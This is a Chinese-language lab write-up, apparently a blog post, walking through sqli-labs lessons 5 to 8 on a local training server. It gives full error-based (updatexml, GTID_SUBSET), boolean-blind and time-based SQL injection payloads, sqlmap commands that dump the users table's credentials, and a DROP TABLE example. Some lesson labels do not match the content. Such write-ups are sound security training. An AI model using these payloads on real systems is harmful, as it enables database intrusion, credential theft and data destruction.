当前位置: 首页 > news >正文

sql-labs less5-8

Less-5

双注入

基于单引号的字符型注入,涉及二次查询注入

Less-6

双注入

基于双引号的字符型注入,涉及二次查询注入

Less-7

字符型注入

基于单引号变形注入之导入文件

Less-8

布尔盲注

不返回任何错误信息,通过布尔逻辑判断

以下是几种常见的SQL报错注入方法及其操作步骤:

方法名称

描述

操作步骤

1. 使用floor()函数

利用floor()函数和count()函数结合,导致数据库返回重复键错误。

1. 构造包含floor()和count()的SQL查询。

2. 通过改变查询中的参数,观察数据库返回的错误信息。

3. 从错误信息中提取所需数据。

2. 使用extractvalue()函数

利用extractvalue()函数解析XML数据时产生的错误信息。

1. 构造包含extractvalue()的SQL查询。

2. 通过改变查询中的XML路径参数,触发错误。

3. 从错误信息中提取所需数据。

3. 使用updatexml()函数

利用updatexml()函数更新XML数据时产生的错误信息。

1. 构造包含updatexml()的SQL查询。

2. 通过改变查询中的XML路径参数,触发错误。

3. 从错误信息中提取所需数据。

4. 使用exp()函数

利用exp()函数计算指数时产生的溢出错误。

1. 构造包含exp()的SQL查询。

2. 通过改变查询中的参数,触发溢出错误。

3. 从错误信息中提取所需数据。

Less-5 Double Query- Single Quotes- String

Character-based Injection

通过字符输入和错误消息利用SQL注入。

第一种,方法结合burpsuite的半自动注入

1,首先查看正确的回显信息是什么样的,搭配id传入数值:?id=1

判断注入类型:?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

结果发生了报错,再测试:?id=1"

能够正常回显,说明单引号破坏了原有查询语句的结果,导致引号无法闭合,由此确定是注入是基于单引号的;而传入双引号能正常处理,说明查询语句能将双引号当中字符串处理,说明这是基于单引号的字符串型注入

2,order by再判断当前数据表有几列:?id=1' order by 1,2,3--+

回显正常,说明数据表至少有3列,再判断有无4列:?id=1' order by 4--+

发生报错,数据表确定为3列

3,再用union判断回显在哪:?id=-1' union select 1,2,3--+

难度上升查询结果不回显,那么就需要用报错注入的方法

4,页面只有三种回显结果:正确(youarein)/错误(不显示)/报错。那么这就需要构造大量的payload去爆出正确信息。

Boolean 注入攻击解释及方法说明:

Boolean 注入攻击概述

Boolean 注入攻击是一种常见的Web安全漏洞利用方式,它发生在应用程序未能正确过滤用户输入,导致攻击者能够通过构造特定的输入来操纵数据库查询的逻辑结果。这种攻击通常用于从数据库中提取信息,而不是直接执行命令。攻击者通过观察页面返回的“yes”或“no”结果来推断数据库中的数据12

Boolean 注入攻击的方法

判断数据库名的长度

攻击者首先尝试判断数据库名的长度,通过构造如 'and length(database())=1--+ 的 SQL 语句,并观察页面返回的结果来确定数据库名的实际长度。这里的 --+ 是注释符,用于注释掉 SQL 语句中的剩余部分,确保攻击者的 SQL 语句能够被执行12

逐字符判断数据库名

确定数据库名长度后,攻击者使用逐字符判断的方式获取数据库名。例如,使用 'and substr(database(),1,1)='t'--+ 来判断数据库名的第一个字符是否为 't'。通过这种方式,攻击者可以逐步揭示数据库名的完整内容12

判断表名和字段名

获取数据库名后,攻击者可以进一步查询表名和字段名。例如,使用 'and substr((select table_name from information_schema.tables where table_schema='test' limit 0,1),1,1)='e'--+ 来判断数据库 'test' 中第一个表名的第一个字符是否为 'e'。通过类似的步骤,可以获取所有表名和字段名2

使用 ASCII 码进行查询

除了直接字符比较外,攻击者还可以使用 ASCII 码进行查询。例如,字母 't' 的 ASCII 码是 116,在 MySQL 中可以使用 ord() 函数进行转换。这样,可以通过 'and ord(substr(database(),1,1))=116--+ 来判断数据库名的第一个字符的 ASCII 值是否为 11612

Web安全解析Boolean注入攻击原理_网络安全_脚本之家

5,先传入判断数据库名长度的payload:

?id=1' and length(database())>=1--+

然后抓包丢Intruder模块,将数值1设置为变量

然后挂上字典范围选择整数1-9爆破

注意到1-8是有回显的,第9条没有回显说明数据库长度为8

 

SUBSTR(string, start, length)

其中:

  • string 是要截取的原始字符串。
  • start 是截取的起始位置。如果是正数,则从字符串的开头开始计数;如果是负数,则从字符串的结尾开始计数。
  • length 是可选参数,表示要截取的子字符串的长度。如果不指定,则截取从起始位置到字符串末尾的所有字符。

6,通过yes/no判断数据库名payload:

?id=1' and substr(database(),1,1)='d'--+

再抓包右键送到Intruder模块里,这次添加两个变量,需要选择集束炸弹模式

第一个字典选择1-9,第二个选择a-z,总共会出现260结果

答案已经明了,按payload1排序payload2得到数据库名:security

3,下一步就是爆出所有表名:

?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a'--+

抓包丢Intruder模块,还是设置两个变量

第一个字典选择1-9,第二个选择a-z,总共会出现260结果

第二种方法,使用sqlmap全自动注入

报错注入的手工方式过于繁琐,可以尝试sqlmap自动化爆破

物理主机IP:192.168.99.238

1,扫描是否注入存在注入点

sqlmap -u "192.168.99.238/sqli-labs/Less-5/?id=1"   

关于SQL注入Payload的分析

一、布尔型盲注(Boolean - based blind)

  1. 原理
    • 在布尔型盲注中,攻击者通过构造逻辑表达式,根据页面返回结果(如正常或错误页面)来推断数据库中的信息。例如,在给出的Payload: id = 1' AND 9885 = 9885 AND 'cClu'='cClu中,9885 = 9885是一个恒成立的表达式。攻击者通过在合法的查询后面添加这样的逻辑判断,如果页面返回正常(因为这个逻辑判断为真),就说明注入点存在并且可以进一步构造类似的表达式来获取数据库信息,如通过改变数字9885为数据库相关函数(如ASCII函数来获取字符的ASCII码等)。
  2. 检测与利用场景
    • 通常用于目标应用程序对查询结果不直接显示数据,而是根据查询结果的真假返回不同的页面(如正常页面或错误页面)。攻击者可以利用这种情况逐步推断数据库中的数据,例如数据库名、表名、列名等。

二、报错型注入(Error - based)

  1. 原理
    • 报错型注入利用数据库的报错信息来获取数据。以给出的Payload: id = 1' AND GTID_SUBSET(CONCAT(0x7171716b71,(SELECT (ELT(3628 = 3628,1))),0x7178627a71),3628) AND 'VAuw'='VAuw为例,这里利用了GTID_SUBSET函数(假设目标数据库是MySQL >= 5.6)。通过构造这样的函数,使数据库执行时产生错误,并且在错误信息中可能包含攻击者想要获取的数据或者可以通过错误信息推断出数据的相关信息。其中SELECT (ELT(3628 = 3628,1))是根据条件返回一个值,这里3628 = 3628为真,所以返回1,并且这个值被嵌入到CONCAT函数构造的字符串中,与GTID_SUBSET函数结合,当执行这个查询时如果数据库配置为显示错误信息,就可能泄露敏感信息。
  2. 检测与利用场景
    • 当目标应用程序的数据库配置为显示详细的错误信息时,这种注入方式比较有效。攻击者可以通过构造特殊的函数组合,让数据库在执行查询时出错并显示包含有用信息的错误消息,从而获取数据库结构、数据等信息。

三、基于时间的盲注(Time - based blind)

  1. 原理
    • 基于时间的盲注通过利用数据库函数(如SLEEP函数)来根据查询结果使页面响应产生时间延迟。在给出的Payload: id = 1' AND (SELECT 5577 FROM (SELECT(SLEEP(5)))lMYU) AND 'hjKP'='hjKP中,SLEEP(5)函数会使数据库查询暂停5秒。如果页面响应有相应的延迟,就说明注入成功。攻击者可以通过这种方式逐步推断数据库中的信息,例如通过改变条件来判断数据库中的数据是否满足某个条件,如果满足则会产生时间延迟,不满足则不会。
  2. 检测与利用场景
    • 适用于目标应用程序对查询结果没有明显的显示差异(既不显示数据也不根据查询结果返回不同的页面状态),但是可以检测到页面响应时间的情况。攻击者可以利用时间延迟来推断数据库中的数据,例如数据库中的用户名、密码等敏感信息。

2,查询数据库--current-db

sqlmap -u "192.168.99.238/sqli-labs/Less-5/?id=1" --current-db

3,查询数据库表名 -tables

sqlmap -u "192.168.99.238/sqli-labs/Less-5/?id=" -D security --tables

4,查询数据表的列名 -columns

sqlmap -u "192.168.99.238/sqli-labs/Less-5/?id=" -D security -T users --columns

5,最后爆出来用户名和密码

sqlmap -u "192.168.99.238/sqli-labs/Less-5/?id=" -D security -T users -C id,username,password --dump

总结:sqlmap只是为了解放双手而存在的自动化工具,只有通过手工注入才能连接SQL报错注入的原理是什么。但当利用SQL注入漏洞最后剩下重复繁琐的工作时,大可以交给sqlmap跑。理解并熟悉运用漏洞原理才是最重要的

报错注入的核心思想

不断的给数据库发送一些没有得到确认是与非的信息,通过数据库不断的报错去排除错误信息,留下正确信息总结出来

第三种方法,updatexel+substr+group_concat函数的纯手工注入

UPDATEXML(XML_document, XPath_string, new_value)

其中:

  • XML_document:这是一个字符串,代表XML文档对象的名称。
  • XPath_string:这是一个XPath格式的字符串,用于指定要更新的XML节点。
  • new_value:这是一个字符串,表示要替换成的新值12

报错注入中的应用

在SQL注入攻击中,UPDATEXML函数常被用于报错注入。攻击者通过构造特定的SQL语句,利用UPDATEXML函数的第二个参数(XPath字符串)来触发数据库错误。这是因为XPath语法对输入有严格的限制,任何不符合XPath语法的输入都会导致错误。攻击者利用这一点,通过在SQL语句中嵌入恶意的XPath表达式,使得数据库在解析时发生错误,并将错误信息返回给攻击者。攻击者随后可以分析这些错误信息,推断出数据库的结构和其他敏感信息12

1,获取当前数据库名称

?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s

2,获取当前数据库所有表名称

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)-- s

3,获取当前数据库user表所有列名称

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s

4,获取当前数据库user表所有username和password的值

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),32,31),0x7e),1)-- s

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),63,31),0x7e),1)-- s

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),94,31),0x7e),1)-- s

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),125,31),0x7e),1)-- s

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),156,31),0x7e),1)-- s

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),187,31),0x7e),1)-- s

源码分析:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 和less-1一样的结构

  • include("../sql - connections/sqli - connect.php"); :包含了一个用于连接MySQL数据库的PHP脚本文件,这个文件应该包含了数据库连接的相关设置,例如创建$con1这样的数据库连接对象(假设在被包含的文件中创建)。
  • error_reporting(0);:关闭了PHP的错误报告。这在生产环境中可能会隐藏一些错误信息,但在开发过程中不建议这样做,因为难以发现潜在的问题。

所以我们不会看到回显信息,以至于只能使用报错注入

Less-6 Double Query- Double Quotes- String

Boolean Blind Injection

使用真/假响应推断数据库信息,而无需直接输出。

 

第一种方法,updatexel+substr+group_concat函数的纯手工注入

1,判断注入类型:?id=1'

正常回显,再输入:?id=1''

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1

发生报错,从报错中可以判断出闭合方式是双引号

2,获取当前数据库名称

?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s

3,获取当前数据库所有表名称

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)-- s

4,获取当前数据库user表所有列名称

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s

5.获取当前数据库user表所有username和password的值

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),32,31),0x7e),1)-- s

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),63,31),0x7e),1)-- s

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),94,31),0x7e),1)-- s

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),125,31),0x7e),1)-- s

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),156,31),0x7e),1)-- s

?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),187,31),0x7e),1)-- s

第二种方法,sqlmap自动化注入

物理主机IP:192.168.99.238

1,扫描是否注入存在注入点

sqlmap -u "192.168.99.238/sqli-labs/Less-6/?id=1"   

2,爆破出数据库名 sqlmap -u "192.168.99.238/sqli-labs/Less-6/?id=1" -current-db

3,爆破出sercurity库下数据表名 sqlmap -u "192.168.99.238/sqli-labs/Less-6/?id=1" -D security -tables

4,爆破user表所有字段名  sqlmap -u "192.168.99.238/sqli-labs/Less-6/?id=1" -D security -T users -columns

5,爆破出username和password字段下所有数据   sqlmap -u "192.168.99.238/sqli-labs/Less-6/?id=1" -D security -T users -C id,username,password --dump

源码分析:

$sql="SELECT * FROM users WHERE id="$id" LIMIT 0,1"; 和less-5都是不回显报错信息,加大了攻击者的注入难度,唯一的区别就在于变量id的闭合方式是双引号

再查看txt记载我打进去的语句(例:最后两句)

?id=1" AND GTID_SUBSET(CONCAT(0x7162787171, (SELECT MID((IFNULL(CAST(password AS NCHAR), 0x20)), 1, 190) FROM `security`.users ORDER BY id LIMIT 12, 1), 0x716a706a71), 4783)-- aSfJ
?id=1" AND GTID_SUBSET(CONCAT(0x7162787171, (SELECT MID((IFNULL(CAST(username AS NCHAR), 0x20)), 1, 190) FROM `security`.users ORDER BY id LIMIT 12, 1), 0x716a706a71), 7192)-- ZLRv

这两条语句的主要目的是尝试从数据库中提取敏感信息,特别是用户的密码和用户名。

  1. 基本结构

id=1:这部分是合法的查询参数,用于指定要查询的记录ID。

" AND ...:这部分是注入的恶意代码,通过逻辑AND操作符连接到合法的查询参数,使得整个表达式依赖于恶意代码的真假。

  1. GTID_SUBSET函数

GTID_SUBSET是一个MySQL函数,用于检查一个全局事务标识集是否是另一个全局事务标识集的子集。在这个上下文中,它被用来构造一个复杂的表达式,使得SQL注入更加隐蔽。

  1. CONCAT函数

CONCAT函数用于将多个字符串连接成一个单一的字符串。在这里,它被用来拼接一个包含子查询结果的字符串。

  1. 子查询

(SELECT ...):这是一个子查询,用于从security.users 表中选择数据。

  • MID:用于提取字符串的一部分。
  • IFNULL:用于处理可能的NULL值,将其替换为一个空格字符(0x20)。
  • CAST:将数据类型转换为NCHAR,以便处理非字符数据。
  • ORDER BY id LIMIT 12, 1:限制查询结果只返回第13条记录(因为LIMIT的偏移是从0开始的)。
  1. 十六进制编码

0x7162787171和0x716a706a71是十六进制编码的字符串,它们在SQL语句中用于混淆和隐藏实际的字符串内容。

  1. 注释符号

--:这是MySQL中的注释符号,用于忽略后面的文本。在这里,它被用来结束恶意代码,使得后面的文本(如aSfJ和ZLRv)不会影响SQL语句的执行。

Less-7 Dump into Outfile

Time-based Blind Injection

基于SQL查询执行导致的响应延迟推断信息

1,搭配id传一个参数试试:?id=1

传单引号参数:?id=1'

You have an error in your SQL syntaxYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')) LIMIT 0,1' at line 1

发生报错,传入?id=1"回显正常,说明是单引号型注入,通过报错信息知道闭合方式为((''))

 

2,试试order 操作符能否可用:?id=1‘ order by 1,2,3--+

不会回显查询结果,相当于只能用盲注或者报错注入那一套了。先用sqlmap跑一下,然后再观察攻击语句寻找手动注入方法

第一种方法,sqlmap自动化注入

1,查询sqlmap -u "192.168.99.238/sqli-labs/Less-7/?id=1" -current-db

2,爆破出sercuity数据表名: sqlmap -u "192.168.99.238/sqli-labs/Less-7/?id=1" -D security -tables

3,爆破出users数据库下所有的列名:sqlmap -u "192.168.99.238/sqli-labs/Less-7/?id=1" -D security -T users -columns

4,最后再爆破出所有的账户密码:sqlmap -u "192.168.99.238/sqli-labs/Less-7/?id=1" -D security -T users -C username,password --dump

5,其实sqlmap已经给我们分析了读该数据库的攻击方式

基于布尔的盲注(boolean - based blind)

  • Payload分析:在基于布尔的盲注的Payload(id = 1') AND 8598 = 8598 AND ('pTdB'='pTdB)中,id = 1是原始的查询参数部分,后面的AND 8598 = 8598是典型的布尔表达式。如果数据库执行这个SQL语句时,这个布尔表达式为真(这里8598 = 8598显然为真),那么根据应用程序对这个查询结果的响应,攻击者可以推断数据库中的信息。最后的AND ('pTdB'='pTdB可能是为了保持语法结构的完整性,因为在SQL注入中,整个语句需要在语法上是合法的。这种类型的注入常用于当应用程序没有直接显示数据库错误信息,但可以根据查询结果的不同响应(如页面正常显示或报错)来判断注入是否成功并获取信息。

基于错误的注入(error - based)

  • Payload分析:基于错误的注入的Payload(id = 1') AND GTID_SUBSET(CONCAT(0x717a6a7671,(SELECT (ELT(7271 = 7271,1))),0x7176717171),7271) AND ('PLnx'='PLnx)比较复杂。id = 1同样是原始查询部分,GTID_SUBSET函数在这里可能是利用了MySQL 5.6及以上版本的特定功能来触发错误。CONCAT函数用于连接字符串,其中包含了十六进制编码的字符串(可能是为了绕过某些过滤机制),SELECT (ELT(7271 = 7271,1))是一个子查询,ELT函数根据条件返回相应的值(这里7271 = 7271为真,所以会返回1)。通过构造这样一个复杂的、能够触发数据库错误的Payload,攻击者可以根据错误信息来获取数据库的结构和数据。这种类型的注入依赖于数据库返回详细的错误信息,如果应用程序隐藏了错误信息,这种注入可能就无法成功。

基于时间的盲注(time - based blind)

  • Payload分析:基于时间的盲注的Payload(id = 1') AND (SELECT 5350 FROM (SELECT(SLEEP(5)))WKWX) AND ('QjTf'='QjTf)中,id = 1是原始查询部分。(SELECT 5350 FROM (SELECT(SLEEP(5)))WKWX)是关键部分,SLEEP(5)会使数据库查询暂停5秒。如果应用程序的响应时间在执行这个注入Payload时明显增加(例如比正常查询多了5秒),那么攻击者就可以推断注入成功并且可以通过构造更复杂的类似Payload来获取数据库信息。这种注入方式比较隐蔽,不需要依赖数据库的错误信息或明显的查询结果变化,而是通过观察响应时间来判断注入是否成功。

第二种方法,半自动SQL布尔盲注+burpsuite

所谓布尔盲注,是就回显信息而言的,对与sql-lab less-7而言,booltrue/false对应的就是页面都正常回显/不回显。那么作为攻击者,最简单理解的攻击方式就是通过sql查询的方式,不断让网页判断回到"true or false",然后我们再通过这个信息总结出数据库的正确内容。

判断第'int'个字符是否为'str'payload?id=1')) and substr(database(),1,1)='a'--+

挂上代理再上传,右键发送到Intruder模块。这里选择Cluster bomb模式,然后设置两个变量:一个是substr()函数的第二个值,代表从这个值开始爆破;第二个值是判断选项的条件,问数据库名第n个字母是否等于这个值。

给变量选择爆破字典,区间分别是0-9,a-z然后开始爆破

第三种方法,updatexel+substr+group_concat函数的纯手工注入

1,判断存在sql注入漏洞之后,先爆出数据库名

?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s

2,再获取security数据库下所有数据表名

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)-- s

3,获取当前数据库user表所有列名称

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s

4,获取当前数据库user表所有username和password的值

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),32,31),0x7e),1)-- s

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),63,31),0x7e),1)-- s

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),94,31),0x7e),1)-- s

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),125,31),0x7e),1)-- s

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),156,31),0x7e),1)-- s

?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),187,31),0x7e),1)-- s

1,?id=1')):这部分是构造的查询字符串的一部分,目的是绕过应用程序对查询字符串的初步检查。这里的'))是为了闭合前面可能存在的查询条件,并引入新的条件。

2,and:用于连接两个条件,使得攻击者可以注入自己的SQL代码。

3,updatexml(1, concat(0x7e, substr((select group_concat(concat(username,'^',password)) from users), 1, 31), 0x7e), 1):这部分是利用updatexml函数进行注入的关键部分。

  • updatexml是一个XML处理函数,通常用于更新XML文档中的内容。在这里,它被滥用来进行SQL注入。
  • concat(0x7e, substr((select group_concat(concat(username,'^',password)) from users), 1, 31), 0x7e):这部分构造了一个字符串,用于拼接用户名和密码。
    • group_concat(concat(username,'^',password)):从users表中选择所有用户名和密码,并用^符号连接起来。
    • substr(..., 1, 31):从拼接的结果中截取前31个字符。
    • concat(0x7e, ..., 0x7e):在前后加上ASCII码为7E的字符(即波浪号~),这通常是用来标记字符串的边界。
  • 1:这是updatexml函数的第三个参数,表示更新成功后返回的值。

4,-- s:这是一个注释符,用于忽略后面的任何内容,防止SQL语句出现语法错误。

源码分析

和less-5,less-6相比只是闭合方式变成了((''))

该源码是一个简单的PHP脚本,用于从数据库中查询用户信息。以下是源码的主要部分:

  1. HTML结构
    • 页面使用了XHTML 1.0 Transitional标准。
    • 页面背景为黑色,文本颜色为白色,标题为“Less-7 Dump into Outfile”。
    • 页面中心显示一张图片。
  2. PHP部分
    • 包含了一个外部文件sqli-connect.php ,用于连接MySQL数据库。
    • 检查是否通过GET请求传递了id参数。
    • 如果id参数存在,将其记录到result.txt 文件中。
    • 构造SQL查询语句SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1,并执行查询。
    • 根据查询结果输出不同的提示信息。

存在的漏洞

  1. SQL注入漏洞
    • 源码中直接将用户输入的id参数拼接到SQL查询语句中,未进行任何过滤或转义,存在SQL注入漏洞。
    • 攻击者可以通过构造恶意的id参数,绕过身份验证或获取敏感数据。
  2. 文件写入漏洞
    • 源码中将用户输入的id参数写入到result.txt 文件中,未进行任何过滤或转义,存在文件写入漏洞。
    • 攻击者可以通过构造恶意的id参数,向服务器写入恶意内容,可能导致服务器被控制。

攻击方式

  1. SQL注入攻击
    • 攻击者可以通过构造恶意的id参数,绕过身份验证或获取敏感数据。例如:
      id=1' OR '1'='1
      这将导致SQL查询语句变为:

      SELECT * FROM users WHERE id=('1' OR '1'='1') LIMIT 0,1
      这将返回所有用户的信息。
  2. 文件写入攻击
    • 攻击者可以通过构造恶意的id参数,向服务器写入恶意内容。例如:
      id=1'); DROP TABLE users; --
      这将导致SQL查询语句变为:

      SELECT * FROM users WHERE id=('1'); DROP TABLE users; --') LIMIT 0,1
      这将删除users表。
  3. 文件包含攻击
    • 如果result.txt 文件被包含在其他PHP脚本中,攻击者可以通过写入恶意PHP代码,实现远程代码执行。

总结

该源码存在严重的SQL注入和文件写入漏洞,攻击者可以通过构造恶意的输入,绕过身份验证、获取敏感数据、删除数据库表,甚至执行任意代码。建议对用户输入进行严格的过滤和转义,避免直接拼接用户输入到SQL查询语句中,并限制文件写入的内容。

Less-8 Blind- Boolian- Single Quotes- String

Stacked Injection

在单个查询中执行多个SQL语句。

1,首先就要判断sql语句闭合方式,首先需要确定正确回显的页面 ?id=1

2,再判断注入类型单双引号,?id=1'

发生报错,再?id=1"

单引号报错,双引号不报错,初步判断为单引号。再判断完整闭合方式就是''

 3,进一步判断攻击方式。发现回显方式就两种:you are in/不回显,只能使用报错或延时注入

第一种方法:burpsuite半自动化注入

原理就是burpsuite的Intruder模块设置两个变量(第N个字符串是否为字母X)进行组合爆破猜解,substr函数是猜解第N个字符串是否为字母X的查询语句。

1,猜解数据库名 ?id=1' and substr(database(),1,1)='a'--+

hackbar传入攻击语句,挂上代理被burpsuite截获到,然后再传入Intruder模块设置两个变量。第一个变量字典设置为0-9,第二个变量字典为a-z

由此得到数据库名为security

2,爆破出数据表名

?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a'--+

由此爆出第一个数据表名为emails,以此类推

2,手工时间注入

利用 left(version(),1)进行尝试,查看一下数据库的版本version(),)

?id=1' and left(version(),1)=5 -- #

一、MSSQL中的时间注入攻击语句示例

在MSSQL数据库中可能存在以下类型的时间注入攻击语句:

  • 例如在检查数据库版本号并根据条件执行延迟操作的语句:
    • IF (SUBSTRING(@@VERSION,1,1) = '1' AND (SELECT COUNT(*) FROM T WHERE UID = 'Guest')!= 0)WaitForDelay'0:0:15',这个语句先检查数据库的版本号,如果是1x版本,并且满足后面的查询条件(这里是查询T表中UID为'Guest'的记录数量不为0),就会执行WaitForDelay'0:0:15'语句,注入者设定超时时间为15秒,可用于检测是否有特定UID存在数据库中4
  • 还有通过声明变量并插入恶意时间参数来读取数据库信息的情况,如:
    • declare @t datetime;然后在SQL语句中利用这个@t变量插入恶意的时间参数,从而从数据库读取相关信息(这里未给出完整的利用该变量进行读取信息的恶意语句,但这是一种可能的方式)1

二、基于时间盲注攻击相关的语句(通用原理下)

  • 基于延迟的时间盲注
    • 在SQL注入中插入WAITFOR DELAY等延时函数来引发服务器端的延迟响应。例如攻击者构造的注入语句中包含WAITFOR DELAY '0:0:5'(表示延迟5秒),通过观察响应时间的变化,攻击者可以判断出查询条件是否为真或假,从而逐步推断出数据库的数据信息5
  • 基于计时的时间盲注
    • 这种类型利用数据库管理系统(DBMS)特定的时间函数,如GETDATE()或SLEEP()等。比如攻击者可能在注入语句中使用SLEEP(5)(表示让查询暂停5秒执行),通过观察应用程序的响应时间是否发生变化来推断数据信息5

第二种方法,sqlmap自动化注入

1,sqlmap判断是否存在sql注入漏洞

这个检测结果说明:

  • id 参数是可注入的,SQLi 发生在 WHERE 或 HAVING 语句中。
  • 布尔盲注的利用方式
    • sqlmap 生成的 Payload:
      id=1' AND 2612=2612 AND 'yZaq'='yZaq
    • AND 2612=2612 始终为真,如果页面返回正常,说明 SQL 语句被成功执行。
    • AND 'yZaq'='yZaq 也是永远成立的,用于检测布尔条件是否生效。
    • 如果服务器 正确响应 这个请求,说明 存在 SQL 注入漏洞

2,枚举数据库

sqlmap -u  "http://192.168.1.101/sqli-labs/less-8/?id=1" --dbs

3,选择数据库并列出表,发现 security 数据库,我们可以列出它的表:

sqlmap -u  "http://192.168.1.101/sqli-labs/less-8/?id=1" -D security --tables

4,获取表的字段,发现 users 表,我们可以查看其字段:

sqlmap -u  "http://192.168.1.101/sqli-labs/less-8/?id=1" -D security -T users --columns

5,Dump 数据,如导出 users 表的所有数据

sqlmap -u "http://192.168.1.101/sqli-labs/less-8/?id=1" --technique B -D security -T users -C username,password --dump --threads 10 --batch

第三种方法,手动盲注

?id=1'and length((select database()))>9--+

#大于号可以换成小于号或者等于号,主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4

?id=1'and ascii(substr((select database()),1,1))=115--+

#substr("78909",1,1)=7 substr(a,b,c)a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。

?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+

判断所有表名字符长度。

?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+

逐一判断表名

?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+

判断所有字段名的长度

?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+

逐一判断字段名。

 

?id=1' and length((select group_concat(username,password) from users))>109--+

判断字段内容长度

?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+

逐一检测内容。

相关文章:

sql-labs less5-8

Less-5 双注入 基于单引号的字符型注入,涉及二次查询注入 Less-6 双注入 基于双引号的字符型注入,涉及二次查询注入 Less-7 字符型注入 基于单引号变形注入之导入文件 Less-8 布尔盲注 不返回任何错误信息,通过布尔逻辑判断 以下…...

iOS开发之最新Demo上传Github步骤(2025.02.28)

前几年的两篇文章: 将项目Demo上传到Github上的操作步骤 常用知识之将Demo上传到Github上的操作步骤(2021.09) 新的操作步骤,需要将两篇文章结合进行,从而达到最终的结果。 一、最新操作步骤: 1、先按…...

注意力机制详解笔记 Attention is all I donot understand!

注意力机制好奇了太久,QKV知道是什么但是一直没搞懂为什么,这段时间终于眼一闭心一横摁头看了一天视频,3B1B大佬太强了!基于GPT看了三个视频,基本讲的toy model,没有讲“硬核”的如何训练和码代码&#xff…...

分布式锁—2.Redisson的可重入锁二

大纲 1.Redisson可重入锁RedissonLock概述 2.可重入锁源码之创建RedissonClient实例 3.可重入锁源码之lua脚本加锁逻辑 4.可重入锁源码之WatchDog维持加锁逻辑 5.可重入锁源码之可重入加锁逻辑 6.可重入锁源码之锁的互斥阻塞逻辑 7.可重入锁源码之释放锁逻辑 8.可重入锁…...

Ribbon实现原理

文章目录 概要什么是Ribbon客户端负载均衡 RestTemplate核心方法GET 请求getForEntitygetForObject POST 请求postForEntitypostForObjectpostForLocation PUT请求DELETE请求 源码分析类图关系 与Eureka结合重试机制 概要 什么是Ribbon Spring Cloud Ribbon是一个基于HTTP和T…...

游戏引擎学习第133天

仓库:https://gitee.com/mrxiao_com/2d_game_3 回顾并设定今天的主题 今天的任务是进一步优化背景资源的流式加载,尤其是在内存管理方面。昨天,我们实现了资源流式加载,让游戏在加载时可以动态地加载背景,而不是一开始就把所有资…...

DeepSeek搭配Excel,制作自定义按钮,实现办公自动化!

